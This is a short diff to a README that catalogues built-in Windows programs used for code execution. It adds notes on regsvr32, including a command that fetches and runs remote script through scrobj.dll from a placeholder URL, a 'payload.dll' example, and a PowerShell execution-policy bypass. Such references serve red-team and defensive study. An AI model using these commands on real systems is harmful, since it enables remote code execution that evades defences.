pwndizzle/CodeExecutionOnWindows/README.md

   - Example: powershell -exec bypass -File test.ps1

 - regsvr32.exe
   - Description: Command-line tool that registers dll files as command components in the registry.
-Notable for its use to bypass UAC and useful as it supports remote DLL retrieval.
+Notable for its use to bypass UAC and useful as it supports remote DLL retrieval with scrobj.dll.
+No arguments need to be supplied to regsvr32 if the dll exports the function DllRegisterServer.
   - Example: regsvr32 /s /n /u /i:[URL] scrobj.dll
+  - Example: regsvr32 payload.dll

 - rundll32.exe
   - Description: Loads and runs DLLs.
 Three parameters are typically used, the DLL to be executed, the function within the DLL to call and any arguments.